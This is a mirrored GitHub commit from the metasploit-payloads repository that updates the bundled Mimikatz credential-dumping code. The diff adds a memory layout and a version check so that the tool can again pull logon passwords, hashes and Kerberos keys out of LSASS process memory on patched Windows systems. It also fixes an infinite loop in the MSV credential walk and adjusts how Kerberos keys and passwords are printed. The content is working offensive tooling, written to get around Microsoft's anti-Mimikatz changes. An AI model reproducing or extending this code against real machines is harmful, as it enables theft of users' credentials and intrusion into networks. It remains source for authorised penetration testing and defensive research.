mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-08 14:36:22 +01:00
Update to Mimikatz commit 8d83d5ab93396263b8c8be8401381b02868fdad6
This fixes the breakages on patched systems (I think). There's also a fix here for an infinite loop in the MSV Code.
This commit is contained in:
OJ
parent
4e1201d73c
commit
15d11f0e9f
@ -47,6 +47,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
@ -317,9 +318,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
else
|
||||
helper = &lsassEnumHelpers[6];
|
||||
|
||||
|
||||
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
|
||||
helper++; // yeah, really, I do that =)
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
@ -389,7 +394,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
dprintf(L"[KIWI] callback invoked with %p", pData);
|
||||
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
dprintf(L"[KIWI] pData->LogonType != Network, printing logon data");
|
||||
//kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
dprintf(L"[KIWI] logondata printed, iterating through packages");
|
||||
for(i = 0; i < pLsassData->nbPackages; i++)
|
||||
{
|
||||
if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
|
||||
@ -399,6 +406,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
dprintf(L"[KIWI] package iteration done");
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
@ -612,7 +620,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
if (buffer.Length = buffer.MaximumLength = (USHORT)pHashPassword->Size)
|
||||
{
|
||||
buffer.Buffer = (PWSTR)pHashPassword->Checksump;
|
||||
|
||||
@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
BYTE waza[12]; /// to do (maybe align) <===================
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_62 *Blink;
|
||||
|
||||
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
|
||||
|
||||
@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
||||
|
||||
PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
||||
@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
|
||||
},
|
||||
};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
|
||||
@ -184,6 +184,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
|
||||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n");
|
||||
for (i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
@ -199,7 +201,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n\t * Key List :\n");
|
||||
if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
@ -397,7 +400,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
||||
if (App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
|
||||
{
|
||||
if (kull_m_file_writeData(filename, (PBYTE)App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
|
||||
kprintf(L"\n\t * Saved to file %s !\n", filename);
|
||||
kprintf(L"\n\t * Saved to file %s !", filename);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
|
||||
LocalFree(App_KrbCred);
|
||||
}
|
||||
|
||||
@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
|
||||
|
||||
PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
|
||||
|
||||
@ -9,7 +9,7 @@ const ANSI_STRING
|
||||
PRIMARY_STRING = {7, 8, "Primary"},
|
||||
CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
|
||||
@ -94,34 +94,40 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { pCredentials, cLsass->hLsassMem };
|
||||
|
||||
while(aLsassMemory.address)
|
||||
while (aLsassMemory.address)
|
||||
{
|
||||
aLocalMemory.address = &credentials;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
|
||||
{
|
||||
aLsassMemory.address = credentials.PrimaryCredentials;
|
||||
while(aLsassMemory.address)
|
||||
while (aLsassMemory.address)
|
||||
{
|
||||
aLocalMemory.address = &primaryCredentials;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
|
||||
if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
|
||||
{
|
||||
aLsassMemory.address = primaryCredentials.Credentials.Buffer;
|
||||
if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
|
||||
if (kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
|
||||
{
|
||||
if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
|
||||
if (kull_m_string_getUnicodeString((PUNICODE_STRING)&primaryCredentials.Primary, cLsass->hLsassMem))
|
||||
{
|
||||
credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
|
||||
LocalFree(primaryCredentials.Primary.Buffer);
|
||||
}
|
||||
}
|
||||
LocalFree(primaryCredentials.Credentials.Buffer);
|
||||
}
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
|
||||
}
|
||||
else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
|
||||
aLsassMemory.address = primaryCredentials.next;
|
||||
}
|
||||
aLsassMemory.address = credentials.next;
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
|
||||
|
||||
PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
|
||||
@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
|
||||
|
||||
PRTL_AVL_TABLE TSGlobalCredTable = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
|
||||
|
||||
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
|
||||
PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
|
||||
LONG offsetWDigestPrimary = 0;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
||||
@ -101,6 +101,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
moduleInformation.DllBase.address = pLdrEntry->DllBase;
|
||||
moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
|
||||
moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
@ -121,6 +122,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
moduleName.Length = pLdrEntry32->BaseDllName.Length;
|
||||
moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
|
||||
moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
@ -151,8 +153,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
|
||||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
@ -185,8 +190,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
|
||||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
@ -208,6 +216,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
|
||||
{
|
||||
RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
}
|
||||
@ -223,6 +232,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
return status;
|
||||
}
|
||||
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
|
||||
{
|
||||
PIMAGE_NT_HEADERS ntHeaders;
|
||||
if (kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
|
||||
{
|
||||
information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
|
||||
LocalFree(ntHeaders);
|
||||
}
|
||||
else information->TimeDateStamp = 0;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
|
||||
{
|
||||
if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
|
||||
|
||||
@ -324,6 +324,7 @@ VOID kull_m_process_initialise();
|
||||
typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
|
||||
KULL_M_MEMORY_ADDRESS DllBase;
|
||||
ULONG SizeOfImage;
|
||||
ULONG TimeDateStamp;
|
||||
PCUNICODE_STRING NameDontUseOutsideCallback;
|
||||
} KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
|
||||
|
||||
@ -346,6 +347,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
|
||||
|
||||
typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);
|
||||
|
||||
Loading…
Reference in New Issue
Block a user